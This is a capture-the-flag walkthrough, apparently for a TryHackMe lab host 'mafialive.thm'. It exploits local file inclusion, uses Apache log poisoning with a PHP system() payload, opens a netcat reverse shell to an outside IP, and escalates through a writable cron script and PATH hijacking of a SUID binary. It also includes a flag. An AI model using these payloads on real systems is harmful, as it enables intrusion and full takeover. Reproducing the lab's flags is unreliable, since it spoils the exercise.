A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.

# Tasks
1. Different hostname
2. flag 1
3. A page under development
4. flag 2
5. user flag
6. user 2 flag
7. root flag

#  NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)  
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)  
|\_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)  
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))  
|\_http-server-header: Apache/2.4.29 (Ubuntu)  
|\_http-title: Wavefire  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel
```

# Web ( Port 80)
## Findings
- Email is support@mafialive.thm
- Usually after the @ is a domain name.
- We can add that to our /etc/hosts
- When we navigate to mafialive.thm, we are greeted with a page under development.
### Feroxbuster
Testing out new tools.
```bash
200       15l       21w      286c http://mafialive.thm/test.php
200        3l        3w       59c http://mafialive.thm/index.html
```
- The page is just a page with a button, it says `Not to be Deployed` so it must be something dangerous or not developed fully yet so it may contain bugs.
- When we click the button it seems to fetch a path.
`http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php`
- Looks like a LFI, we can try to read /etc/passwd
`Sorry, Thats not allowed`
- After testing it out, it seems that the URL needs to start with :
`http://mafialive.thm/test.php?view=/var/www/html/development_testing/`
or it will error out.
- But if we do something like :
`http://mafialive.thm/test.php?view=/var/www/html/development_testing/test.php`
it doesn't error out so it must have worked
- What if we use a PHP wrapper
- `http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php`
- We get the source code in base64
```html
<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

	    //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    if(isset($_GET["view"])){
	    if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
            	include $_GET['view'];
            }else{

		echo 'Sorry, Thats not allowed';
            }
	}
        ?>
    </div>
</body>

</html>
```
- Looking at the source code, it if doesn't contain `../../`  and includes the path of development testing it includes it.
- The flaw in this it just checks **EXACTLY** for `../../`. 
`http://mafialive.thm/test.php?view=/var/www/html/development_testing/..///////..////..//////..///////..////..//////etc/passwd`
This payload is able to bypass the filter.
- Since we know it's an apache server, we can try to do some log poisoning.
- `http://mafialive.thm/test.php?view=/var/www/html/development_testing/..///////..////..//////..///////..////..//////var/log/apache2/access.log`
- We can access the logs.
- Refer to this [blog](https://www.hackingarticles.in/apache-log-poisoning-through-lfi/)
- We can inject php code in the user-agent header
`<? php system ($_GET['cmd']); ?>`
- Now we can add a GET parameter at our URL.
- `http://mafialive.thm/test.php?view=/var/www/html/development_testing/..///////..////..//////..///////..////..//////var/log/apache2/access.log&cmd=id`
- We can see this in the response
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`

# Foothold
- Now we can try to get a reverse shell since we have RCE
- We can try to get a reverse shell
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f`
This payload worked for me.
- We now have a shell.

# Privilege Escalation to user
- While looking around I found this in /opt/helloworld.sh
```sh
\-rwxrwxrwx  1 archangel archangel   66 Nov 20  2020 helloworld.sh
```
Apparently we have write permission to it.
Let's create a reverse shell. This script looks like a cronjob, we can can check that in /etc/crontab
```sh
*/1 *   * * *   archangel /opt/helloworld.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
```
# Privilege Escalation to root
- Now we have escalated our privileges to user archangel
- I'll be creating a SSH key for a better shell.
- The secret directory contains a dangerous binary.
```
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID\[sha1\]=9093af828f30f957efce9  
020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped
```
- We don't have write permission to it.
- An interesting line when we use strings on it:
`cp /home/user/archangel/myfiles/\* /opt/backupfiles`
It's not calling `cp` from it's absolute path which can lead to PATH hijacking
- Create another binary called `cp` anywhere, I used /tmp and make it malicious
```bash
chmod 4777 /bin/bash
```
This command will set /bin/bash as SUID.
- Now change our PATH variable
`export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin`
Now when we run ./backup, it should use cp from our /tmp since it's first on our PATH.
And we're root.


